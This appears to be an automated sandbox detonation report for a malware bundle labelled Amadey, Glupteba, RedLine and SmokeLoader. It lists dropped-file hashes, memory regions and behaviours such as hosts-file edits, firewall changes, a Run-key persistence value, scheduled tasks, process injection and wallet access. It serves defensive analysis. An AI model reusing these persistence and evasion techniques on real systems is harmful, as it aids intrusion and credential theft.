| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
memory/1732-263-0x0000000004C50000-0x0000000004C90000-memory.dmp
memory/924-265-0x0000000000910000-0x0000000000950000-memory.dmp
memory/924-296-0x00000000003D0000-0x00000000003D1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
memory/1676-314-0x0000000000810000-0x0000000000850000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
\Windows\rss\csrss.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
\Windows\rss\csrss.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
memory/1248-326-0x0000000004EB0000-0x0000000004EF0000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
memory/924-367-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/956-368-0x0000000004AA0000-0x0000000004AE0000-memory.dmp
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | f0616fa8bc54ece07e3107057f74e4db |
| SHA1 | b33995c4f9a004b7d806c4bb36040ee844781fca |
| SHA256 | 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026 |
| SHA512 | 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/924-401-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/1204-423-0x000007FEB0990000-0x000007FEB099A000-memory.dmp
memory/2320-428-0x000000001B140000-0x000000001B422000-memory.dmp
memory/2320-430-0x0000000001F80000-0x0000000001F88000-memory.dmp
memory/2320-431-0x0000000002760000-0x00000000027E0000-memory.dmp
memory/2320-432-0x0000000002760000-0x00000000027E0000-memory.dmp
memory/2320-433-0x0000000002760000-0x00000000027E0000-memory.dmp
memory/2320-434-0x000000000276B000-0x00000000027A2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 430d7647b8c46c207dc007b48fe836ae |
| SHA1 | e3e3b306e9b897647bdf16dbcb4f81bc58a929ff |
| SHA256 | 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f |
| SHA512 | 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FDYWHJ6UDQO96NWP1PW3.temp
| MD5 | 430d7647b8c46c207dc007b48fe836ae |
| SHA1 | e3e3b306e9b897647bdf16dbcb4f81bc58a929ff |
| SHA256 | 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f |
| SHA512 | 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95 |
memory/2528-441-0x000000001AFF0000-0x000000001B2D2000-memory.dmp
memory/2528-442-0x0000000002320000-0x0000000002328000-memory.dmp
memory/2528-446-0x00000000023D0000-0x0000000002450000-memory.dmp
memory/2528-447-0x00000000023D0000-0x0000000002450000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
\Program Files\Google\Chrome\updater.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 430d7647b8c46c207dc007b48fe836ae |
| SHA1 | e3e3b306e9b897647bdf16dbcb4f81bc58a929ff |
| SHA256 | 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f |
| SHA512 | 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95 |
memory/2740-458-0x0000000002720000-0x00000000027A0000-memory.dmp
memory/2740-459-0x0000000002724000-0x0000000002727000-memory.dmp
memory/2740-460-0x000000000272B000-0x0000000002762000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | 3e9af076957c5b2f9c9ce5ec994bea05 |
| SHA1 | a8c7326f6bceffaeed1c2bb8d7165e56497965fe |
| SHA256 | e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e |
| SHA512 | 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 430d7647b8c46c207dc007b48fe836ae |
| SHA1 | e3e3b306e9b897647bdf16dbcb4f81bc58a929ff |
| SHA256 | 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f |
| SHA512 | 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2956-470-0x000000000271B000-0x0000000002752000-memory.dmp
memory/2956-469-0x0000000002714000-0x0000000002717000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | 5da3a881ef991e8010deed799f1a5aaf |
| SHA1 | fea1acea7ed96d7c9788783781e90a2ea48c1a53 |
| SHA256 | f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4 |
| SHA512 | 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09 |
\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 430d7647b8c46c207dc007b48fe836ae |
| SHA1 | e3e3b306e9b897647bdf16dbcb4f81bc58a929ff |
| SHA256 | 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f |
| SHA512 | 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95 |
memory/2556-528-0x0000000002294000-0x0000000002297000-memory.dmp
memory/2556-529-0x000000000229B000-0x00000000022D2000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | 3e9af076957c5b2f9c9ce5ec994bea05 |
| SHA1 | a8c7326f6bceffaeed1c2bb8d7165e56497965fe |
| SHA256 | e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e |
| SHA512 | 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 7029e43242271f90359ed8193c1e4848 |
| SHA1 | b9d38c911e4b2e6cb03a242b02022e7ff365e150 |
| SHA256 | 1a5f3744d5c71f5c96cf706649a8a3fb93b12f406562dd5fb142a94c4097017b |
| SHA512 | 2a03d3b38f8708e8b10c367451a2787f38da2ba8c0a487dfcd7ac962970e99060a41ef3278f2ca9b0c2c6bf1ac9c9529fac8f198ee3f9ca75aa896373da568ff |
memory/2696-538-0x00000000022D0000-0x0000000002350000-memory.dmp
memory/2696-539-0x00000000022D0000-0x0000000002350000-memory.dmp
memory/2696-540-0x00000000022D0000-0x0000000002350000-memory.dmp
memory/2696-541-0x00000000022D0000-0x0000000002350000-memory.dmp
memory/2944-544-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2944-546-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/3068-547-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2852-550-0x0000000000840000-0x0000000000848000-memory.dmp
memory/2852-551-0x0000000001084000-0x0000000001087000-memory.dmp
memory/2852-552-0x000000000108B000-0x00000000010C2000-memory.dmp
memory/1980-554-0x0000000000940000-0x0000000000948000-memory.dmp
memory/1980-555-0x0000000000FD4000-0x0000000000FD7000-memory.dmp
memory/1980-556-0x0000000000FDB000-0x0000000001012000-memory.dmp
memory/3068-561-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2240-562-0x00000000004B0000-0x00000000004D0000-memory.dmp
memory/2240-570-0x00000000004B0000-0x00000000004D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
| MD5 | f801950a962ddba14caaa44bf084b55c |
| SHA1 | 7cadc9076121297428442785536ba0df2d4ae996 |
| SHA256 | c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f |
| SHA512 | 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5 |
memory/1304-586-0x000000002DCE0000-0x000000002E505000-memory.dmp
memory/1304-587-0x000000002DCE0000-0x000000002E505000-memory.dmp
memory/920-588-0x0000000000400000-0x0000000000C25000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-07-02 00:14
Reported
2023-07-02 00:17
Platform
win10v2004-20230621-en
Max time kernel
103s
Max time network
153s
Command Line
Signatures
Amadey
GCleaner
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\oneetx.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
Checks installed software on the system
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1020 set thread context of 4500 | N/A | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe |
| PID 2940 set thread context of 2072 | N/A | C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 3748 set thread context of 3048 | N/A | C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 4768 set thread context of 2768 | N/A | C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
